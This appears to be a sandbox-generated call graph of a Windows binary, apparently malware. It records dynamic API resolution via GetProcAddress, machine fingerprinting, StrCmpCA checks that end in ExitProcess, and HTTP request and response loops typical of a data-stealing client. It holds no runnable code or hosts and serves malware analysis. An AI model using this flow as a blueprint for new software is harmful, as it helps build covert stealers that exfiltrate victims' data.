14196->14197 14198 d83014 14197->14198 14199 d845c0 2 API calls 14198->14199 14200 d8302d 14199->14200 14201 d845c0 2 API calls 14200->14201 14202 d83046 14201->14202 14203 d845c0 2 API calls 14202->14203 14204 d8305f 14203->14204 14205 d845c0 2 API calls 14204->14205 14206 d83078 14205->14206 14207 d845c0 2 API calls 14206->14207 14208 d83091 14207->14208 14209 d845c0 2 API calls 14208->14209 14210 d830aa 14209->14210 14211 d845c0 2 API calls 14210->14211 14212 d830c3 14211->14212 14213 d845c0 2 API calls 14212->14213 14214 d830dc 14213->14214 14215 d845c0 2 API calls 14214->14215 14216 d830f5 14215->14216 14217 d845c0 2 API calls 14216->14217 14218 d8310e 14217->14218 14219 d845c0 2 API calls 14218->14219 14220 d83127 14219->14220 14221 d845c0 2 API calls 14220->14221 14222 d83140 14221->14222 14223 d845c0 2 API calls 14222->14223 14224 d83159 14223->14224 14225 d845c0 2 API calls 14224->14225 14226 d83172 14225->14226 14227 d845c0 2 API calls 14226->14227 14228 d8318b 14227->14228 14229 d845c0 2 API calls 14228->14229 14230 d831a4 14229->14230 14231 d845c0 2 API calls 14230->14231 14232 d831bd 14231->14232 14233 d845c0 2 API calls 14232->14233 14234 d831d6 14233->14234 14235 d845c0 2 API calls 14234->14235 14236 d831ef 14235->14236 14237 d845c0 2 API calls 14236->14237 14238 d83208 14237->14238 14239 d845c0 2 API calls 14238->14239 14240 d83221 14239->14240 14241 d845c0 2 API calls 14240->14241 14242 d8323a 14241->14242 14243 d845c0 2 API calls 14242->14243 14244 d83253 14243->14244 14245 d845c0 2 API calls 14244->14245 14246 d8326c 14245->14246 14247 d845c0 2 API calls 14246->14247 14248 d83285 14247->14248 14249 d845c0 2 API calls 14248->14249 14250 d8329e 14249->14250 14251 d845c0 2 API calls 14250->14251 14252 d832b7 14251->14252 14253 d845c0 2 API calls 14252->14253 14254 d832d0 14253->14254 14255 d845c0 2 API calls 14254->14255 14256 d832e9 14255->14256 14257 d845c0 2 API calls 14256->14257 14258 d83302 14257->14258 14259 d845c0 2 API calls 14258->14259 14260 d8331b 14259->14260 14261 d845c0 2 API calls 14260->14261 14262 d83334 14261->14262 14263 d845c0 2 API calls 14262->14263 14264 d8334d 14263->14264 14265 d845c0 2 API calls 14264->14265 14266 d83366 14265->14266 14267 d845c0 2 API calls 14266->14267 14268 d8337f 14267->14268 14269 d845c0 2 API calls 14268->14269 14270 d83398 14269->14270 14271 d845c0 2 API calls 14270->14271 14272 d833b1 14271->14272 14273 d845c0 2 API calls 14272->14273 14274 d833ca 14273->14274 14275 d845c0 2 API calls 14274->14275 14276 d833e3 14275->14276 14277 d845c0 2 API calls 14276->14277 14278 d833fc 14277->14278 14279 d845c0 2 API calls 14278->14279 14280 d83415 14279->14280 14281 d845c0 2 API calls 14280->14281 14282 d8342e 14281->14282 14283 d845c0 2 API calls 14282->14283 14284 d83447 14283->14284 14285 d845c0 2 API calls 14284->14285 14286 d83460 14285->14286 14287 d845c0 2 API calls 14286->14287 14288 d83479 14287->14288 14289 d845c0 2 API calls 14288->14289 14290 d83492 14289->14290 14291 d845c0 2 API calls 14290->14291 14292 d834ab 14291->14292 14293 d845c0 2 API calls 14292->14293 14294 d834c4 14293->14294 14295 d845c0 2 API calls 14294->14295 14296 d834dd 14295->14296 14297 d845c0 2 API calls 14296->14297 14298 d834f6 14297->14298 14299 d845c0 2 API calls 14298->14299 14300 d8350f 14299->14300 14301 d845c0 2 API calls 14300->14301 14302 d83528 14301->14302 14303 d845c0 2 API calls 14302->14303 14304 d83541 14303->14304 14305 d845c0 2 API calls 14304->14305 14306 d8355a 14305->14306 14307 d845c0 2 API calls 14306->14307 14308 d83573 14307->14308 14309 d845c0 2 API calls 14308->14309 14310 d8358c 14309->14310 14311 d845c0 2 API calls 14310->14311 14312 d835a5 14311->14312 14313 d845c0 2 API calls 14312->14313 14314 d835be 14313->14314 14315 d845c0 2 API calls 14314->14315 14316 d835d7 14315->14316 14317 d845c0 2 API calls 14316->14317 14318 d835f0 14317->14318 14319 d845c0 2 API calls 14318->14319 14320 d83609 14319->14320 14321 d845c0 2 API calls 14320->14321 14322 d83622 14321->14322 14323 d845c0 2 API calls 14322->14323 14324 d8363b 14323->14324 14325 d845c0 2 API calls 14324->14325 14326 d83654 14325->14326 14327 d845c0 2 API calls 14326->14327 14328 d8366d 14327->14328 14329 d845c0 2 API calls 14328->14329 14330 d83686 14329->14330 14331 d845c0 2 API calls 14330->14331 14332 d8369f 14331->14332 14333 d845c0 2 API calls 14332->14333 14334 d836b8 14333->14334 14335 d845c0 2 API calls 14334->14335 14336 d836d1 14335->14336 14337 d845c0 2 API calls 14336->14337 14338 d836ea 14337->14338 14339 d845c0 2 API calls 14338->14339 14340 d83703 14339->14340 14341 d845c0 2 API calls 14340->14341 14342 d8371c 14341->14342 14343 d845c0 2 API calls 14342->14343 14344 d83735 14343->14344 14345 d845c0 2 API calls 14344->14345 14346 d8374e 14345->14346 14347 d845c0 2 API calls 14346->14347 14348 d83767 14347->14348 14349 d845c0 2 API calls 14348->14349 14350 d83780 14349->14350 14351 d845c0 2 API calls 14350->14351 14352 d83799 14351->14352 14353 d845c0 2 API calls 14352->14353 14354 d837b2 14353->14354 14355 d845c0 2 API calls 14354->14355 14356 d837cb 14355->14356 14357 d845c0 2 API calls 14356->14357 14358 d837e4 14357->14358 14359 d845c0 2 API calls 14358->14359 14360 d837fd 14359->14360 14361 d845c0 2 API calls 14360->14361 14362 d83816 14361->14362 14363 d845c0 2 API calls 14362->14363 14364 d8382f 14363->14364 14365 d845c0 2 API calls 14364->14365 14366 d83848 14365->14366 14367 d845c0 2 API calls 14366->14367 14368 d83861 14367->14368 14369 d845c0 2 API calls 14368->14369 14370 d8387a 14369->14370 14371 d845c0 2 API calls 14370->14371 14372 d83893 14371->14372 14373 d845c0 2 API calls 14372->14373 14374 d838ac 14373->14374 14375 d845c0 2 API calls 14374->14375 14376 d838c5 14375->14376 14377 d845c0 2 API calls 14376->14377 14378 d838de 14377->14378 14379 d845c0 2 API calls 14378->14379 14380 d838f7 14379->14380 14381 d845c0 2 API calls 14380->14381 14382 d83910 14381->14382 14383 d845c0 2 API calls 14382->14383 14384 d83929 14383->14384 14385 d845c0 2 API calls 14384->14385 14386 d83942 14385->14386 14387 d845c0 2 API calls 14386->14387 14388 d8395b 14387->14388 14389 d845c0 2 API calls 14388->14389 14390 d83974 14389->14390 14391 d845c0 2 API calls 14390->14391 14392 d8398d 14391->14392 14393 d845c0 2 API calls 14392->14393 14394 d839a6 14393->14394 14395 d845c0 2 API calls 14394->14395 14396 d839bf 14395->14396 14397 d845c0 2 API calls 14396->14397 14398 d839d8 14397->14398 14399 d845c0 2 API calls 14398->14399 14400 d839f1 14399->14400 14401 d845c0 2 API calls 14400->14401 14402 d83a0a 14401->14402 14403 d845c0 2 API calls 14402->14403 14404 d83a23 14403->14404 14405 d845c0 2 API calls 14404->14405 14406 d83a3c 14405->14406 14407 d845c0 2 API calls 14406->14407 14408 d83a55 14407->14408 14409 d845c0 2 API calls 14408->14409 14410 d83a6e 14409->14410 14411 d845c0 2 API calls 14410->14411 14412 d83a87 14411->14412 14413 d845c0 2 API calls 14412->14413 14414 d83aa0 14413->14414 14415 d845c0 2 API calls 14414->14415 14416 d83ab9 14415->14416 14417 d845c0 2 API calls 14416->14417 14418 d83ad2 14417->14418 14419 d845c0 2 API calls 14418->14419 14420 d83aeb 14419->14420 14421 d845c0 2 API calls 14420->14421 14422 d83b04 14421->14422 14423 d845c0 2 API calls 14422->14423 14424 d83b1d 14423->14424 14425 d845c0 2 API calls 14424->14425 14426 d83b36 14425->14426 14427 d845c0 2 API calls 14426->14427 14428 d83b4f 14427->14428 14429 d845c0 2 API calls 14428->14429 14430 d83b68 14429->14430 14431 d845c0 2 API calls 14430->14431 14432 d83b81 14431->14432 14433 d845c0 2 API calls 14432->14433 14434 d83b9a 14433->14434 14435 d845c0 2 API calls 14434->14435 14436 d83bb3 14435->14436 14437 d845c0 2 API calls 14436->14437 14438 d83bcc 14437->14438 14439 d845c0 2 API calls 14438->14439 14440 d83be5 14439->14440 14441 d845c0 2 API calls 14440->14441 14442 d83bfe 14441->14442 14443 d845c0 2 API calls 14442->14443 14444 d83c17 14443->14444 14445 d845c0 2 API calls 14444->14445 14446 d83c30 14445->14446 14447 d845c0 2 API calls 14446->14447 14448 d83c49 14447->14448 14449 d845c0 2 API calls 14448->14449 14450 d83c62 14449->14450 14451 d845c0 2 API calls 14450->14451 14452 d83c7b 14451->14452 14453 d845c0 2 API calls 14452->14453 14454 d83c94 14453->14454 14455 d845c0 2 API calls 14454->14455 14456 d83cad 14455->14456 14457 d845c0 2 API calls 14456->14457 14458 d83cc6 14457->14458 14459 d845c0 2 API calls 14458->14459 14460 d83cdf 14459->14460 14461 d845c0 2 API calls 14460->14461 14462 d83cf8 14461->14462 14463 d845c0 2 API calls 14462->14463 14464 d83d11 14463->14464 14465 d845c0 2 API calls 14464->14465 14466 d83d2a 14465->14466 14467 d845c0 2 API calls 14466->14467 14468 d83d43 14467->14468 14469 d845c0 2 API calls 14468->14469 14470 d83d5c 14469->14470 14471 d845c0 2 API calls 14470->14471 14472 d83d75 14471->14472 14473 d845c0 2 API calls 14472->14473 14474 d83d8e 14473->14474 14475 d845c0 2 API calls 14474->14475 14476 d83da7 14475->14476 14477 d845c0 2 API calls 14476->14477 14478 d83dc0 14477->14478 14479 d845c0 2 API calls 14478->14479 14480 d83dd9 14479->14480 14481 d845c0 2 API calls 14480->14481 14482 d83df2 14481->14482 14483 d845c0 2 API calls 14482->14483 14484 d83e0b 14483->14484 14485 d845c0 2 API calls 14484->14485 14486 d83e24 14485->14486 14487 d845c0 2 API calls 14486->14487 14488 d83e3d 14487->14488 14489 d845c0 2 API calls 14488->14489 14490 d83e56 14489->14490 14491 d845c0 2 API calls 14490->14491 14492 d83e6f 14491->14492 14493 d845c0 2 API calls 14492->14493 14494 d83e88 14493->14494 14495 d845c0 2 API calls 14494->14495 14496 d83ea1 14495->14496 14497 d845c0 2 API calls 14496->14497 14498 d83eba 14497->14498 14499 d845c0 2 API calls 14498->14499 14500 d83ed3 14499->14500 14501 d845c0 2 API calls 14500->14501 14502 d83eec 14501->14502 14503 d845c0 2 API calls 14502->14503 14504 d83f05 14503->14504 14505 d845c0 2 API calls 14504->14505 14506 d83f1e 14505->14506 14507 d845c0 2 API calls 14506->14507 14508 d83f37 14507->14508 14509 d845c0 2 API calls 14508->14509 14510 d83f50 14509->14510 14511 d845c0 2 API calls 14510->14511 14512 d83f69 14511->14512 14513 d845c0 2 API calls 14512->14513 14514 d83f82 14513->14514 14515 d845c0 2 API calls 14514->14515 14516 d83f9b 14515->14516 14517 d845c0 2 API calls 14516->14517 14518 d83fb4 14517->14518 14519 d845c0 2 API calls 14518->14519 14520 d83fcd 14519->14520 14521 d845c0 2 API calls 14520->14521 14522 d83fe6 14521->14522 14523 d845c0 2 API calls 14522->14523 14524 d83fff 14523->14524 14525 d845c0 2 API calls 14524->14525 14526 d84018 14525->14526 14527 d845c0 2 API calls 14526->14527 14528 d84031 14527->14528 14529 d845c0 2 API calls 14528->14529 14530 d8404a 14529->14530 14531 d845c0 2 API calls 14530->14531 14532 d84063 14531->14532 14533 d845c0 2 API calls 14532->14533 14534 d8407c 14533->14534 14535 d845c0 2 API calls 14534->14535 14536 d84095 14535->14536 14537 d845c0 2 API calls 14536->14537 14538 d840ae 14537->14538 14539 d845c0 2 API calls 14538->14539 14540 d840c7 14539->14540 14541 d845c0 2 API calls 14540->14541 14542 d840e0 14541->14542 14543 d845c0 2 API calls 14542->14543 14544 d840f9 14543->14544 14545 d845c0 2 API calls 14544->14545 14546 d84112 14545->14546 14547 d845c0 2 API calls 14546->14547 14548 d8412b 14547->14548 14549 d845c0 2 API calls 14548->14549 14550 d84144 14549->14550 14551 d845c0 2 API calls 14550->14551 14552 d8415d 14551->14552 14553 d845c0 2 API calls 14552->14553 14554 d84176 14553->14554 14555 d845c0 2 API calls 14554->14555 14556 d8418f 14555->14556 14557 d845c0 2 API calls 14556->14557 14558 d841a8 14557->14558 14559 d845c0 2 API calls 14558->14559 14560 d841c1 14559->14560 14561 d845c0 2 API calls 14560->14561 14562 d841da 14561->14562 14563 d845c0 2 API calls 14562->14563 14564 d841f3 14563->14564 14565 d845c0 2 API calls 14564->14565 14566 d8420c 14565->14566 14567 d845c0 2 API calls 14566->14567 14568 d84225 14567->14568 14569 d845c0 2 API calls 14568->14569 14570 d8423e 14569->14570 14571 d845c0 2 API calls 14570->14571 14572 d84257 14571->14572 14573 d845c0 2 API calls 14572->14573 14574 d84270 14573->14574 14575 d845c0 2 API calls 14574->14575 14576 d84289 14575->14576 14577 d845c0 2 API calls 14576->14577 14578 d842a2 14577->14578 14579 d845c0 2 API calls 14578->14579 14580 d842bb 14579->14580 14581 d845c0 2 API calls 14580->14581 14582 d842d4 14581->14582 14583 d845c0 2 API calls 14582->14583 14584 d842ed 14583->14584 14585 d845c0 2 API calls 14584->14585 14586 d84306 14585->14586 14587 d845c0 2 API calls 14586->14587 14588 d8431f 14587->14588 14589 d845c0 2 API calls 14588->14589 14590 d84338 14589->14590 14591 d845c0 2 API calls 14590->14591 14592 d84351 14591->14592 14593 d845c0 2 API calls 14592->14593 14594 d8436a 14593->14594 14595 d845c0 2 API calls 14594->14595 14596 d84383 14595->14596 14597 d845c0 2 API calls 14596->14597 14598 d8439c 14597->14598 14599 d845c0 2 API calls 14598->14599 14600 d843b5 14599->14600 14601 d845c0 2 API calls 14600->14601 14602 d843ce 14601->14602 14603 d845c0 2 API calls 14602->14603 14604 d843e7 14603->14604 14605 d845c0 2 API calls 14604->14605 14606 d84400 14605->14606 14607 d845c0 2 API calls 14606->14607 14608 d84419 14607->14608 14609 d845c0 2 API calls 14608->14609 14610 d84432 14609->14610 14611 d845c0 2 API calls 14610->14611 14612 d8444b 14611->14612 14613 d845c0 2 API calls 14612->14613 14614 d84464 14613->14614 14615 d845c0 2 API calls 14614->14615 14616 d8447d 14615->14616 14617 d845c0 2 API calls 14616->14617 14618 d84496 14617->14618 14619 d845c0 2 API calls 14618->14619 14620 d844af 14619->14620 14621 d845c0 2 API calls 14620->14621 14622 d844c8 14621->14622 14623 d845c0 2 API calls 14622->14623 14624 d844e1 14623->14624 14625 d845c0 2 API calls 14624->14625 14626 d844fa 14625->14626 14627 d845c0 2 API calls 14626->14627 14628 d84513 14627->14628 14629 d845c0 2 API calls 14628->14629 14630 d8452c 14629->14630 14631 d845c0 2 API calls 14630->14631 14632 d84545 14631->14632 14633 d845c0 2 API calls 14632->14633 14634 d8455e 14633->14634 14635 d845c0 2 API calls 14634->14635 14636 d84577 14635->14636 14637 d845c0 2 API calls 14636->14637 14638 d84590 14637->14638 14639 d845c0 2 API calls 14638->14639 14640 d845a9 14639->14640 14641 d99c10 14640->14641 14642 d99c20 43 API calls 14641->14642 14643 d9a036 8 API calls 14641->14643 14642->14643 14644 d9a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14643->14644 14645 d9a146 14643->14645 14644->14645 14646 d9a153 8 API calls 14645->14646 14647 d9a216 14645->14647 14646->14647 14648 d9a298 14647->14648 14649 d9a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14647->14649 14650 d9a2a5 6 API calls 14648->14650 14651 d9a337 14648->14651 14649->14648 14650->14651 14652 d9a41f 14651->14652 14653 d9a344 9 API calls 14651->14653 14654 d9a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14652->14654 14655 d9a4a2 14652->14655 14653->14652 14654->14655 14656 d9a4ab GetProcAddress GetProcAddress 14655->14656 14657 d9a4dc 14655->14657 14656->14657 14658 d9a515 14657->14658 14659 d9a4e5 GetProcAddress GetProcAddress 14657->14659 14660 d9a612 14658->14660 14661 d9a522 10 API calls 14658->14661 14659->14658 14662 d9a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14660->14662 14663 d9a67d 14660->14663 14661->14660 14662->14663 14664 d9a69e 14663->14664 14665 d9a686 GetProcAddress 14663->14665 14666 d95ca3 14664->14666 14667 d9a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14664->14667 14665->14664 14668 d81590 14666->14668 14667->14666 15789 d81670 14668->15789 14671 d9a7a0 lstrcpy 14672 d815b5 14671->14672 14673 d9a7a0 lstrcpy 14672->14673 14674 d815c7 14673->14674 14675 d9a7a0 lstrcpy 14674->14675 14676 d815d9 14675->14676 14677 d9a7a0 lstrcpy 14676->14677 14678 d81663 14677->14678 14679 d95510 14678->14679 14680 d95521 14679->14680 14681 d9a820 2 API calls 14680->14681 14682 d9552e 14681->14682 14683 d9a820 2 API calls 14682->14683 14684 d9553b 14683->14684 14685 d9a820 2 API calls 14684->14685 14686 d95548 14685->14686 14687 d9a740 lstrcpy 14686->14687 14688 d95555 14687->14688 14689 d9a740 lstrcpy 14688->14689 14690 d95562 14689->14690 14691 d9a740 lstrcpy 14690->14691 14692 d9556f 14691->14692 14693 d9a740 lstrcpy 14692->14693 14712 d9557c 14693->14712 14694 d9a740 lstrcpy 14694->14712 14695 d95643 StrCmpCA 14695->14712 14696 d956a0 StrCmpCA 14697 d957dc 14696->14697 14696->14712 14698 d9a8a0 lstrcpy 14697->14698 14699 d957e8 14698->14699 14701 d9a820 2 API calls 14699->14701 14700 d9a820 lstrlen lstrcpy 14700->14712 14704 d957f6 14701->14704 14702 d95856 StrCmpCA 14705 d95991 14702->14705 14702->14712 14703 d951f0 20 API calls 14703->14712 14706 d9a820 2 API calls 14704->14706 14707 d9a8a0 lstrcpy 14705->14707 14708 d95805 14706->14708 14711 d9599d 14707->14711 14709 d81670 lstrcpy 14708->14709 14733 d95811 14709->14733 14710 d81590 lstrcpy 14710->14712 14713 d9a820 2 API calls 14711->14713 14712->14694 14712->14695 14712->14696 14712->14700 14712->14702 14712->14703 14712->14710 14714 d95a0b StrCmpCA 14712->14714 14715 d952c0 25 API calls 14712->14715 14722 d9a8a0 lstrcpy 14712->14722 14729 d9578a StrCmpCA 14712->14729 14731 d9a7a0 lstrcpy 14712->14731 14732 d9593f StrCmpCA 14712->14732 14716 d959ab 14713->14716 14717 d95a28 14714->14717 14718 d95a16 Sleep 14714->14718 14715->14712 14719 d9a820 2 API calls 14716->14719 14721 d9a8a0 lstrcpy 14717->14721 14718->14712 14720 d959ba 14719->14720 14723 d81670 lstrcpy 14720->14723 14724 d95a34 14721->14724 14722->14712 14723->14733 14725 d9a820 2 API calls 14724->14725 14726 d95a43 14725->14726 14727 d9a820 2 API calls 14726->14727 14728 d95a52 14727->14728 14730 d81670 lstrcpy 14728->14730 14729->14712 14730->14733 14731->14712 14732->14712 14733->13786 14735 d9754c 14734->14735 14736 d97553 GetVolumeInformationA 14734->14736 14735->14736 14740 d97591 14736->14740 14737 d975fc GetProcessHeap RtlAllocateHeap 14738 d97619 14737->14738 14739 d97628 wsprintfA 14737->14739 14741 d9a740 lstrcpy 14738->14741 14742 d9a740 lstrcpy 14739->14742 14740->14737 14743 d95da7 14741->14743 14742->14743 14743->13807 14745 d9a7a0 lstrcpy 14744->14745 14746 d84899 14745->14746 15798 d847b0 14746->15798 14748 d848a5 14749 d9a740 lstrcpy 14748->14749 14750 d848d7 14749->14750 14751 d9a740 lstrcpy 14750->14751 14752 d848e4 14751->14752 14753 d9a740 lstrcpy 14752->14753 14754 d848f1 14753->14754 14755 d9a740 lstrcpy 14754->14755 14756 d848fe 14755->14756 14757 d9a740 lstrcpy 14756->14757 14758 d8490b InternetOpenA StrCmpCA 14757->14758 14759 d84944 14758->14759 14760 d84ecb InternetCloseHandle 14759->14760 15804 d98b60 14759->15804 14762 d84ee8 14760->14762 15819 d89ac0 CryptStringToBinaryA 14762->15819 14763 d84963 15812 d9a920 14763->15812 14766 d84976 14768 d9a8a0 lstrcpy 14766->14768 14773 d8497f 14768->14773 14769 d9a820 2 API calls 14770 d84f05 14769->14770 14771 d9a9b0 4 API calls 14770->14771 14774 d84f1b 14771->14774 14772 d84f27 ctype 14776 d9a7a0 lstrcpy 14772->14776 14777 d9a9b0 4 API calls 14773->14777 14775 d9a8a0 lstrcpy 14774->14775 14775->14772 14785 d84f57 14776->14785 14778 d849a9 14777->14778 14779 d9a8a0 lstrcpy 14778->14779 14780 d849b2 14779->14780 14781 d9a9b0 4 API calls 14780->14781 14782 d849d1 14781->14782 14783 d9a8a0 lstrcpy 14782->14783 14784 d849da 14783->14784 14786 d9a920 3 API calls 14784->14786 14785->13810 14787 d849f8 14786->14787 14788 d9a8a0 lstrcpy 14787->14788 14789 d84a01 14788->14789 14790 d9a9b0 4 API calls 14789->14790 14791 d84a20 14790->14791 14792 d9a8a0 lstrcpy 14791->14792 14793 d84a29 14792->14793 14794 d9a9b0 4 API calls 14793->14794 14795 d84a48 14794->14795 14796 d9a8a0 lstrcpy 14795->14796 14797 d84a51 14796->14797 14798 d9a9b0 4 API calls 14797->14798 14799 d84a7d 14798->14799 14800 d9a920 3 API calls 14799->14800 14801 d84a84 14800->14801 14802 d9a8a0 lstrcpy 14801->14802 14803 d84a8d 14802->14803 14804 d84aa3 InternetConnectA 14803->14804 14804->14760 14805 d84ad3 HttpOpenRequestA 14804->14805 14807 d84b28 14805->14807 14808 d84ebe InternetCloseHandle 14805->14808 14809 d9a9b0 4 API calls 14807->14809 14808->14760 14810 d84b3c 14809->14810 14811 d9a8a0 lstrcpy 14810->14811 14812 d84b45 14811->14812 14813 d9a920 3 API calls 14812->14813 14814 d84b63 14813->14814 14815 d9a8a0 lstrcpy 14814->14815 14816 d84b6c 14815->14816 14817 d9a9b0 4 API calls 14816->14817 14818 d84b8b 14817->14818 14819 d9a8a0 lstrcpy 14818->14819 14820 d84b94 14819->14820 14821 d9a9b0 4 API calls 14820->14821 14822 d84bb5 14821->14822 14823 d9a8a0 lstrcpy 14822->14823 14824 d84bbe 14823->14824 14825 d9a9b0 4 API calls 14824->14825 14826 d84bde 14825->14826 14827 d9a8a0 lstrcpy 14826->14827 14828 d84be7 14827->14828 14829 d9a9b0 4 API calls 14828->14829 14830 d84c06 14829->14830 14831 d9a8a0 lstrcpy 14830->14831 14832 d84c0f 14831->14832 14833 d9a920 3 API calls 14832->14833 14834 d84c2d 14833->14834 14835 d9a8a0 lstrcpy 14834->14835 14836 d84c36 14835->14836 14837 d9a9b0 4 API calls 14836->14837 14838 d84c55 14837->14838 14839 d9a8a0 lstrcpy 14838->14839 14840 d84c5e 14839->14840 14841 d9a9b0 4 API calls 14840->14841 14842 d84c7d 14841->14842 14843 d9a8a0 lstrcpy 14842->14843 14844 d84c86 14843->14844 14845 d9a920 3 API calls 14844->14845 14846 d84ca4 14845->14846 14847 d9a8a0 lstrcpy 14846->14847 14848 d84cad 14847->14848 14849 d9a9b0 4 API calls 14848->14849 14850 d84ccc 14849->14850 14851 d9a8a0 lstrcpy 14850->14851 14852 d84cd5 14851->14852 14853 d9a9b0 4 API calls 14852->14853 14854 d84cf6 14853->14854 14855 d9a8a0 lstrcpy 14854->14855 14856 d84cff 14855->14856 14857 d9a9b0 4 API calls 14856->14857 14858 d84d1f 14857->14858 14859 d9a8a0 lstrcpy 14858->14859 14860 d84d28 14859->14860 14861 d9a9b0 4 API calls 14860->14861 14862 d84d47 14861->14862 14863 d9a8a0 lstrcpy 14862->14863 14864 d84d50 14863->14864 14865 d9a920 3 API calls 14864->14865 14866 d84d6e 14865->14866 14867 d9a8a0 lstrcpy 14866->14867 14868 d84d77 14867->14868 14869 d9a740 lstrcpy 14868->14869 14870 d84d92 14869->14870 14871 d9a920 3 API calls 14870->14871 14872 d84db3 14871->14872 14873 d9a920 3 API calls 14872->14873 14874 d84dba 14873->14874 14875 d9a8a0 lstrcpy 14874->14875 14876 d84dc6 14875->14876 14877 d84de7 lstrlen 14876->14877 14878 d84dfa 14877->14878 14879 d84e03 lstrlen 14878->14879 15818 d9aad0 14879->15818 14881 d84e13 HttpSendRequestA 14882 d84e32 InternetReadFile 14881->14882 14883 d84e67 InternetCloseHandle 14882->14883 14888 d84e5e 14882->14888 14886 d9a800 14883->14886 14885 d9a9b0 4 API calls 14885->14888 14886->14808 14887 d9a8a0 lstrcpy 14887->14888 14888->14882 14888->14883 14888->14885 14888->14887 15825 d9aad0 14889->15825 14891 d917c4 StrCmpCA 14892 d917cf ExitProcess 14891->14892 14893 d917d7 14891->14893 14894 d919c2 14893->14894 14895 d9185d StrCmpCA 14893->14895 14896 d9187f StrCmpCA 14893->14896 14897 d918f1 StrCmpCA 14893->14897 14898 d91951 StrCmpCA 14893->14898 14899 d91970 StrCmpCA 14893->14899 14900 d91913 StrCmpCA 14893->14900 14901 d91932 StrCmpCA 14893->14901 14902 d918ad StrCmpCA 14893->14902 14903 d918cf StrCmpCA 14893->14903 14904 d9a820 lstrlen lstrcpy 14893->14904 14894->13812 14895->14893 14896->14893 14897->14893 14898->14893 14899->14893 14900->14893 14901->14893 14902->14893 14903->14893 14904->14893 14906 d9a7a0 lstrcpy 14905->14906 14907 d85979 14906->14907 14908 d847b0 2 API calls 14907->14908 14909 d85985 14908->14909 14910 d9a740 lstrcpy 14909->14910 14911 d859ba 14910->14911 14912 d9a740 lstrcpy 14911->14912 14913 d859c7 14912->14913 14914 d9a740 lstrcpy 14913->14914 14915 d859d4 14914->14915 14916 d9a740 lstrcpy 14915->14916 14917 d859e1 14916->14917 14918 d9a740 lstrcpy 14917->14918 14919 d859ee InternetOpenA StrCmpCA 14918->14919 14920 d85a1d 14919->14920 14921 d85fc3 InternetCloseHandle 14920->14921 14922 d98b60 3 API calls 14920->14922 14923 d85fe0 14921->14923 14924 d85a3c 14922->14924 14926 d89ac0 4 API calls 14923->14926 14925 d9a920 3 API calls 14924->14925 14927 d85a4f 14925->14927 14928 d85fe6 14926->14928 14929 d9a8a0 lstrcpy 14927->14929 14930 d9a820 2 API calls 14928->14930 14932 d8601f ctype 14928->14932 14934 d85a58 14929->14934 14931 d85ffd 14930->14931 14933 d9a9b0 4 API calls 14931->14933 14936 d9a7a0 lstrcpy 14932->14936 14935 d86013 14933->14935 14938 d9a9b0 4 API calls 14934->14938 14937 d9a8a0 lstrcpy 14935->14937 14946 d8604f 14936->14946 14937->14932 14939 d85a82 14938->14939 14940 d9a8a0 lstrcpy 14939->14940 14941 d85a8b 14940->14941 14942 d9a9b0 4 API calls 14941->14942 14943 d85aaa 14942->14943 14944 d9a8a0 lstrcpy 14943->14944 14945 d85ab3 14944->14945 14947 d9a920 3 API calls 14945->14947 14946->13818 14948 d85ad1 14947->14948 14949 d9a8a0 lstrcpy 14948->14949 14950 d85ada 14949->14950 14951 d9a9b0 4 API calls 14950->14951 14952 d85af9 14951->14952 14953 d9a8a0 lstrcpy 14952->14953 14954 d85b02 14953->14954 14955 d9a9b0 4 API calls 14954->14955 14956 d85b21 14955->14956 14957 d9a8a0 lstrcpy 14956->14957 14958 d85b2a 14957->14958 14959 d9a9b0 4 API calls 14958->14959 14960 d85b56 14959->14960 14961 d9a920 3 API calls 14960->14961 14962 d85b5d 14961->14962 14963 d9a8a0 lstrcpy 14962->14963 14964 d85b66 14963->14964 14965 d85b7c InternetConnectA 14964->14965 14965->14921 14966 d85bac HttpOpenRequestA 14965->14966 14968 d85c0b 14966->14968 14969 d85fb6 InternetCloseHandle 14966->14969 14970 d9a9b0 4 API calls 14968->14970 14969->14921 14971 d85c1f 14970->14971 14972 d9a8a0 lstrcpy 14971->14972 14973 d85c28 14972->14973 14974 d9a920 3 API calls 14973->14974 14975 d85c46 14974->14975 14976 d9a8a0 lstrcpy 14975->14976 14977 d85c4f 14976->14977 14978 d9a9b0 4 API calls 14977->14978 14979 d85c6e 14978->14979 14980 d9a8a0 lstrcpy 14979->14980 14981 d85c77 14980->14981 14982 d9a9b0 4 API calls 14981->14982 14983 d85c98 14982->14983 14984 d9a8a0 lstrcpy 14983->14984 14985 d85ca1 14984->14985 14986 d9a9b0 4 API calls 14985->14986 14987 d85cc1 14986->14987 14988 d9a8a0 lstrcpy 14987->14988 14989 d85cca 14988->14989 14990 d9a9b0 4 API calls 14989->14990 14991 d85ce9 14990->14991 14992 d9a8a0 lstrcpy 14991->14992 14993 d85cf2 14992->14993 14994 d9a920 3 API calls 14993->14994 14995 d85d10 14994->14995 14996 d9a8a0 lstrcpy 14995->14996 14997 d85d19 14996->14997 14998 d9a9b0 4 API calls 14997->14998 14999 d85d38 14998->14999 15000 d9a8a0 lstrcpy 14999->15000 15001 d85d41 15000->15001 15002 d9a9b0 4 API calls 15001->15002 15003 d85d60 15002->15003 15004 d9a8a0 lstrcpy 15003->15004 15005 d85d69 15004->15005 15006 d9a920 3 API calls 15005->15006 15007 d85d87 15006->15007 15008 d9a8a0 lstrcpy 15007->15008 15009 d85d90 15008->15009 15010 d9a9b0 4 API calls 15009->15010 15011 d85daf 15010->15011 15012 d9a8a0 lstrcpy 15011->15012 15013 d85db8 15012->15013 15014 d9a9b0 4 API calls 15013->15014 15015 d85dd9 15014->15015 15016 d9a8a0 lstrcpy 15015->15016 15017 d85de2 15016->15017 15018 d9a9b0 4 API calls 15017->15018 15019 d85e02 15018->15019 15020 d9a8a0 lstrcpy 15019->15020 15021 d85e0b 15020->15021 15022 d9a9b0 4 API calls 15021->15022 15023 d85e2a 15022->15023 15024 d9a8a0 lstrcpy 15023->15024 15025 d85e33 15024->15025 15026 d9a920 3 API calls 15025->15026 15027 d85e54 15026->15027 15028 d9a8a0 lstrcpy 15027->15028 15029 d85e5d 15028->15029 15030 d85e70 lstrlen 15029->15030 15826 d9aad0 15030->15826 15032 d85e81 lstrlen GetProcessHeap RtlAllocateHeap 15827 d9aad0 15032->15827 15034 d85eae 